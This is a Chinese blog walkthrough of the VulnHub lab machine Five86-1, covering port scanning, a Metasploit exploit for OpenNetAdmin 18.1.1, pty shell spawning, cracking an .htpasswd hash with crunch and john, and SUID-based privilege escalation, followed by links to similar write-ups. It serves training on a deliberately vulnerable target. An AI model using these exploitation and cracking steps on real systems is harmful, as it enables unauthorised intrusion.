vulnhub靶机Five86-1——新手进阶1

最新推荐文章于 2024-04-16 16:02:39 发布
最新推荐文章于 2024-04-16 16:02:39 发布
阅读量1.4k 收藏 47
点赞数 31
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75051044/article/details/135768857
版权
本文讲述了在KaliLinux环境下对Five86-1靶机进行渗透测试的过程,包括网络配置、端口扫描、信息收集、漏洞利用(Metasploit)、提权以及最终获取flag.txt的详细步骤。
摘要由CSDN通过智能技术生成

环境准备

攻击机:kali

靶机:Five86-1

靶机地址:https://www.vulnhub.com/entry/five86-1,417/
 

实验目的:获取flag

信息收集

打开靶机和kali虚拟机,将靶机的网络连接改为NAT模式,用nmap扫描靶机ip,得知ip为192.168.2.33

namp -sP 192.168.2.128/24

获取靶机开放端口

masscan 192.168.233 -p 0-65535 --rate 100000

扫描开放端口详细信息

nmap -T4 -sV -A -o -p 22,80,10000 192.168.2.33

打开浏览器进入80端口,http://192.168.2.33,并用Wappalyzer查看网页,没有扫描发现

查看10000端口,192.168.2.33:10000

发现提示,进入http://192.168.2.33:10000,发现登录页面

尝试输入admin,密码123456(随便试一下),没什么发现,爆破密码花费时间久,所以尝试一下其他的方法

尝试web网站目录爆破工具Dirb

看一下网页的robot.txt,可以知道网站的作者希望所有爬虫都不访问文件目录/ona的内容,所以肯定有重要的内容

进入192.168.2.33/ona

漏洞利用

这个页面的信息还是比较多的,不过我看了一下,作者英文不好,没发现什么有用的,所以打算找一下网页的漏洞,网页的名字和版本,searchsploit OpenNetAdmin 18.1.1

直接到https://www.exploit-db.com/漏洞库查找,找到对应的漏洞文件下载下来,把文件放入/usr/share/metasploit-framework/modules/exploits/unix/文件夹,进入msf,进行以下操作

exploit/47772

set rhosts 192.168.2.33

set lhost 192.168.2.128(主机ip)

exploit

成功进入目标webshell,输入命令发现无法执行,ls以下查看文件

提权

使用python切换至交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

 查看根目录,有个html文件,查看,有reports,查看,发现隐文件.htpasswd,查看文件

 发现用户和密码

提示密码10位数且只有aefhrt这些字符,用crunch创建密码字典mima.txt,桌面创建user.txt里保存douglas的用户密码

所以john爆破密码

进入douglas用户

查看根目录

经过以下步骤,进入jen用户

查看邮件内容,知道Moss的密码,进入Moss用户

 

利用suid命令,找到moss目录下的文件,进行访问

访问后发现一个root权限的二进制文件upyourgame,执行,就获取到了root权限 找到flag.txt

 

vulnhub靶机Five86-1渗透笔记
liver100day的博客
09-07 1363
文章目录1.环境搭建2.主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sick0s1.1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 2.主机发现 3.漏洞利用 4.提权 5.总结 ...
Vulnhub靶机Five86-2渗透笔记
liver100day的博客
09-11 581
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 查找有关WordPress 5.1.4版本的漏洞3.2 WPscan 破解账户密码3.3 反弹shell第一步:生成一句话木马文件第二步:压缩一句话木马文件第三步:上传压缩文件并获取shell4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机Five86-2 IP地址未知 靶机下载地址:http://www.
vulnhubFive86-1
底层社会中的弱智
02-04 791
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
VulnhubFive86-1
4ut15m's blog
02-09 651
Description The ultimate goal of this challenge is to get root and to read the one and only flag. 信息搜集 nmap -sP 192.168.1.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:02 CST Nmap...
vulnhub-five86-1
qq_41810304的博客
02-22 431
下载地址:https://www.vulnhub.com/entry/five86-1,417/ 前言: 作为小白(参考我写过的其他文章前言,懒得再来一遍了) Kali:192.168.1.4 目标机:192.168.1.27 信息收集: 漏洞挖掘: 分别访问80和10000端口。80端口访问后,页面源码如下: 访问10000端口发现登录页面,确认该端口是一个cms网页,但...
渗透Five86-1
Ays.Ie的博客
03-02 221
本篇文章为five86的第1个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Five86-1 渗透测试
Darklord.W
07-26 407
一、信息收集 扫描目标主机机器开放端口 ​ nmap扫描开放端口详细服务 ​ 扫描两个端口下的web目录,80端口有内容,10000端口下没有其他目录出现 ​ 访问web目录,首先是80端口下的目录 /reports目录需要用户名密码验证 ​ robots.txt目录下 ​ 访问/ona目录,发现是一个web系统,浏览相关信息得到80端口index页面可能需要添加一条解析记录才可以访问 ​ 尝试添加记录并访问 ​ 结果还是不行 ​ 但是的话,可以...
vulnhub靶场FIVE86-1
kukudeshuo的博客
09-07 327
vulnhub靶场FIVE86-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/five86-1,417/ 攻击机:kali(192.168.109.128) 靶机FIVE86-1(192.168.109.175) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.175 使用nmap扫描查看目标靶机端口开放情
five86-1靶机
薛定谔嘚喵博客
04-04 202
OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界 面,可以帮助减少跟踪误差,并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序,用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络!查看moss家目录,发现了一个隐藏目录为.games,查看.games看到upyourgame的所属者和所属组有点意思,全是root,并且可执行。发现可以用jen用户的身份执行/bin/cp,且无密码。
Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 638
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
VulnHub系列』five86_1-Walkthrough
ins1ght的博客
01-23 977
这是我完成的VulnHub上的第36个靶机靶机发布日期:2020年1月8日,难度:初级+。
渗透测试学习之靶机Five86-1
情感博主V
03-21 594
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.147 2个http端口,80是Apache,10000那个查一下: web站点相关服务信息 80Apache下的站点: 10000端口下的集成环境: 服务信息看不出啥 ...
Vulnhub靶机Five86-1详细解析
蚁景网安学院
01-15 474
喜欢就关注我吧,订阅更多最新消息文章字数1539 预计阅读时长7分钟 涉及知识点实操练习-VulnHub渗透测试实战靶场Node 1.0https://www.hetianlab.c...
Five86-1 靶机实战
最新发布
braty_的博客
04-16 460
标题发现:OpenNetAdmin :: 0wn Your Network 这是一款 网络管理器。直接ssh登录,这里是想办法登录更高权限的jen,我们这里发现了公钥,这里只能尝试爆破和sql注入均无果,,还是回到80端口尝试。发现脚本文件,查看是乱码,,我们直接运行即可提权为root。是有页面显示,告诉我们要 https 访问。的命令注入利用脚本,和RCE远程命令执行脚本。拿到shell,我们弹一个稳定的shell。告诉我们密码大概是10位数,字符均是。什么都没有,,看看君子协议。发现一封邮件,去看看。
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1359
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 1903
新手向】VulnHub靶场MONEYBOX:1 | 详细解析
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值